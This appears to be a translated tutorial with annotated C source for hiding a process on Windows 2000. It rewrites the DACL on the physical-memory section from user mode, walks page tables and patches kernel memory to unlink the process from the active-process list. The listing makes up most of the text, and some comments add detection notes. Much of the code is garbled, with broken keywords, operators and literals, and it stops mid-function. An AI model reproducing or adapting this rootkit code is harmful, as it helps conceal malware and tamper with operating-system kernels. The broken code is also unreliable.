Before the explanation, a word about some structures: the process executive block contains several process-related linked lists, one of which is the active-process list. One important role of this list is to serve the system-information queries that enumerate the currently active processes. Interestingly, Microsoft apparently does not use it for process switching, presumably for efficiency reasons, so removing an entry from it causes no problem that cannot be ignored (this is the basis of this program). What to do is therefore obvious: remove the process you want to hide from the doubly linked active-process list, and it can no longer be found, not even by a kernel debugger (such as SoftICE / Proc). The code for hiding the current process under Windows 2000 is as follows: #include
/*
 * UNICODE_STRING: counted wide-string descriptor (length, maximum length,
 * buffer pointer). It is filled by RtlInitUnicodeString and passed as
 * OBJECT_ATTRIBUTES.ObjectName in OpenPhysicalMemory below. The keyword and
 * the member type names appear in the wrong case in this transcription
 * (Typedef, ushort, pwstr); the layout itself is the Length / MaximumLength /
 * Buffer triple.
 */
Typedef struct _unicode_string {ushort length; ushort maximumlength; pwstr buffer;} unicode_string, * punicode_string;
/*
 * OBJ_* flags for OBJECT_ATTRIBUTES.Attributes. None of them is used by the
 * listing: OpenPhysicalMemory sets attributes.attributes = 0. As printed, all
 * eight definitions sit on a single line, so only OBJ_INHERIT would be a real
 * macro and the remaining text would become its replacement list; the
 * transcription also has a space inside "# define".
 */
#define OBJ_INHERIT 0x00000002L # define OBJ_PERMANENT 0x00000010L # define OBJ_EXCLUSIVE 0x00000020L # define OBJ_CASE_INSENSITIVE 0x00000040L # define OBJ_OPENIF 0x00000080L # define OBJ_OPENLINK 0x00000100L # define OBJ_KERNEL_HANDLE 0x00000200L #define OBJ_VALID_ATTRIBUTES 0x000003F2L
/*
 * OBJECT_ATTRIBUTES plus the two ntdll entry points the listing resolves at
 * run time. Together with the globals below, everything on this page serves
 * one goal: obtain a writable mapping of physical memory from user mode and
 * use it to read and patch kernel structures. From a defender's view the
 * observable artefacts are a user-mode handle to the physical-memory section
 * (opened through ZwOpenSection resolved by GetProcAddress rather than an
 * import), a DACL change on that section, and a process missing from the
 * active-process list while other enumerations still see it (cross-view
 * comparison is the usual counter to list unlinking).
 */
typedef struct _OBJECT_ATTRIBUTES {ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
/* Function-pointer types for the two ntdll exports resolved in InitNTDLL. */
typedef NTSTATUS (CALLBACK * ZWOPENSECTION) (OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes);
typedef VOID (CALLBACK * RTLINITUNICODESTRING) (IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString);
/* Globals: the resolved entry points, the ntdll module handle, the section
 * handle (g_hMPM) and the view of physical offset 0x30000 that LinearToPhys
 * later indexes as the page directory. Nothing in this view releases g_hMPM
 * or unmaps g_pMapPhysicalMemory. */
RTLINITUNICODESTRING RtlInitUnicodeString; ZWOPENSECTION ZwOpenSection; HMODULE g_hNtDLL = NULL; PVOID g_pMapPhysicalMemory = NULL; HANDLE g_hMPM = NULL;
/* InitNTDLL: loads ntdll and stores the two resolved exports in the globals
 * above. Only the LoadLibrary result is checked; both GetProcAddress results
 * are stored unchecked, so a failed lookup leaves a NULL function pointer that
 * OpenPhysicalMemory then calls through. The library-name literal and several
 * identifiers are damaged in this transcription ("ntdll. ", RTURN, g_hntdll,
 * the split "RTLINITUNICODEST ring"). */
BOOL InitNTDLL () {g_hNtDLL = LoadLibrary ( "ntdll. "); if (! g_hntdll) {RTURN FALSE;} RTLINITUNICODESTRING = (RTLINITUNICODESTRING) GETPROCADDRESS (G_HNTDLL," RTLINITUNICODEST ring "); ZwOpenSection = (ZWOPENSECTION) GetProcAddress (g_hNtDLL," ZwOpenSection "); return TRUE;}
/* CloseNTDLL: releases the ntdll module handle. As transcribed the condition
 * is an assignment (= NULL) with a stray '!' later in the body; the intended
 * test is presumably g_hNtDLL != NULL. */
VOID CloseNTDLL () {if (g_hNtDLL = NULL) {FreeLibrary (g_hNtDLL);!}}
/* SetPhyscialMemorySectionCanBeWrited: reads the section object's DACL with
 * GetSecurityInfo, builds one EXPLICIT_ACCESS entry granting SECTION_MAP_WRITE
 * to the trustee named "CURRENT_USER", merges it with SetEntriesInAcl and
 * writes the result back with SetSecurityInfo. Every failure jumps to CleanUp
 * without being reported and the function is VOID, so the caller cannot tell
 * whether the DACL was actually changed (OpenPhysicalMemory proceeds either
 * way). pDacl is not freed separately, consistent with it pointing into the
 * pSD buffer that is freed. The '!' characters of the "!= ERROR_SUCCESS"
 * tests are displaced in this transcription.
 * Detection note: a DACL rewrite on the physical-memory section, or any
 * user-mode handle to it opened with WRITE_DAC, is a high-signal event for
 * object-access auditing. */
VOID SetPhyscialMemorySectionCanBeWrited (HANDLE hSection) {PACL pDacl = NULL; PACL pNewDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; DWORD dwRes; EXPLICIT_ACCESS ea; if (! dwRes = GetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, & pDacl, NULL, & pSD) = ERROR_SUCCESS) {goto CleanUp; } ZeromeMory (& EA, SIZEOF (EXPLICIT_ACCESS)); EA.GRFACCESSPERMISSIONS = section_map_write;
ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance = NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = "CURRENT_USER"; if (dwRes = SetEntriesInAcl (1, & ea, pDacl, ! & pNewDacl) = ERROR_SUCCESS) {goto CleanUp;} if (dwRes = SetSecurityInfo (hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL) = ERROR_SUCCESS) {goto CleanUp;} CleanUp:! if (pSD) LocalFree (pSD) ; if (pNewDacl) LocalFree (pNewDacl);}
/* OpenPhysicalMemory: opens the physical-memory section by name (the path
 * separators in the literal are garbled here) for read+write mapping. On
 * STATUS_ACCESS_DENIED it reopens with READ_CONTROL | WRITE_DAC, rewrites the
 * DACL via the helper above, closes that handle and opens once more; the
 * retry and the NT_SUCCESS test are scrambled in this transcription. It then
 * maps 0x1000 bytes at physical offset 0x30000 into g_pMapPhysicalMemory,
 * which LinearToPhys indexes as the page directory, so the offset is a fixed
 * assumption about one kernel build's memory layout. The MapViewOfFile access
 * argument is the bare constant 4. If the mapping fails the function returns
 * NULL but leaves g_hMPM open. Several member names are lower-cased or split
 * in this transcription (.Rootdirectory, .sec urityQualityOfService). */
HANDLE OpenPhysicalMemory () {NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; RtlInitUnicodeString (& physmemString, L "// Device // PhysicalMemory"); attributes.Length = sizeof (OBJECT_ATTRIBUTES); attributes .Rootdirectory = null; attributes.objectname = & physmemstring; attributes.attributes = 0; attributes.securityDescriptor = null; attributes.sec urityQualityOfService = NULL; status = ZwOpenSection (& g_hMPM, SECTION_MAP_READ | SECTION_MAP_WRITE, & attributes); if (status == STATUS_ACCESS_DENIED) {status = ZwOpenSection (& g_hMPM, READ_CONTROL | WRITE_DAC, & attributes); SetPhyscialMemorySectionCanBeWrited (g_hMPM); CloseHandle (g_hMPM); status = (! NT_SUCCESS (status)); | ZwOpenSection (& g_hMPM, SECTION_MAP_READ SECTION_MAP_WRITE, & attributes)} if {return NULL;} g_pMapPhysicalMemory = MapViewOfFile (g_hMPM, 4, 0, 0x30000, 0x1000); if (g_pMapPhysicalMemory ==
NULL) {return NULL;} return g_hMPM;}
/* LinearToPhys: a two-level 32-bit page-table walk done from user mode
 * against the physical-memory mapping. BaseAddress is treated as the page
 * directory (index VAddr >> 22); bit 0 of the entry is tested as the present
 * bit and bit 7 (0x80, the x86 PS bit) selects the large-page path, whose
 * masks (0xFFC00000 / 0x003FFFFF) split the address at 4 MiB. Otherwise the
 * page-table page is mapped, the PTE at index (VAddr & 0x003FF000) >> 12 is
 * read, and the view is unmapped. Returns 0 for a non-present directory or
 * table entry, which is indistinguishable from a genuine physical address 0.
 * The 10-bit indices match a non-PAE layout only; a PAE or 64-bit kernel
 * would not be walked correctly. Damaged tokens in this transcription: the
 * '|' between the two large-page halves, the "tmp = 0" test (written as an
 * assignment), the split "! =" operators, and the PTE mask constant. */
PVOID LinearToPhys (PULONG BaseAddress, PVOID addr) {ULONG VAddr = (ULONG) addr, PGDE, PTE, PAddr; PGDE = BaseAddress [VAddr >> 22]; if ((PGDE & 1) ! = 0) {ULONG tmp = PGDE & 0x00000080; if (tmp = 0) {PAddr = (PGDE & 0xFFC00000) (vAddr & 0x003FFFFF);!} else {PGDE = (ULONG) MapViewOfFile (g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000) ; PTE = ((pulong) PGDE [(VADDR & 0x003FF000) >> 12]; if ((PTE & 1)! = 0) {PADDR = (PTE & 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFF); UnmapViewOffile (PVOID) PGDE);} else Return 0 ;}} else return 0; return (PVOID) PAddr;}
/* GetData: reads one ULONG at a virtual address by translating it with
 * LinearToPhys and mapping the containing 4 KiB physical page read-only
 * (access constant 4). Returns 0 both when the mapping fails and when the
 * value read is 0, so callers cannot distinguish the two cases. Identifier
 * case is inconsistent in this transcription (TMP / tmp, Return / return). */
ULONG GetData (PVOID addr) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, 4, 0, phys & 0xfffff000, 0x1000); if (TMP == 0) Return 0; Ulong Ret = TMP [(Phys & 0xFFF) >> 2]; unmapViewoffile (TMP); return ret;}
/* SetData: write counterpart of GetData, mapping the page with FILE_MAP_WRITE
 * and storing one ULONG. This is the primitive that patches kernel structures
 * from user mode and it bypasses every kernel-side check; later Windows
 * releases withdrew user-mode access to the physical-memory section, so the
 * primitive is tied to the era of this listing. The "= =" operator and the
 * mixed-case identifiers are transcription damage. */
bool setData (pvoid addr, ULONG data) {ULONG phys = (ULONG) LinearToPhys ((PULONG) g_pMapPhysicalMemory, (PVOID) addr); PULONG tmp = (PULONG) MapViewOfFile (g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000); if (tmp = = 0) RETURN FALSE; TMP [(Phys & 0xFFF) >> 2] = data; unmapViewoffile (TMP); Return True;}
/* HideProcessatall: the entry point, truncated at the end of this view, so
 * only its opening is documented. It initialises ntdll, opens the section,
 * then chains GetData reads starting from a hard-coded kernel address
 * (0xffdff124) and a fixed structure offset (0x22c); those constants are what
 * tie the listing to a single OS build. The remainder (including any release
 * of g_hMPM) is outside this page. */
Bool HideProcessatall () {if (initntdll ()) {i (OpenPhysicalMemory () == 0) {RETURN FALSE;} ulong thread = getdata (pvoid) 0xffdff124); ulong process = getData (pvoid (thread 0x22c)); ulong fw = getData (PVOID (Process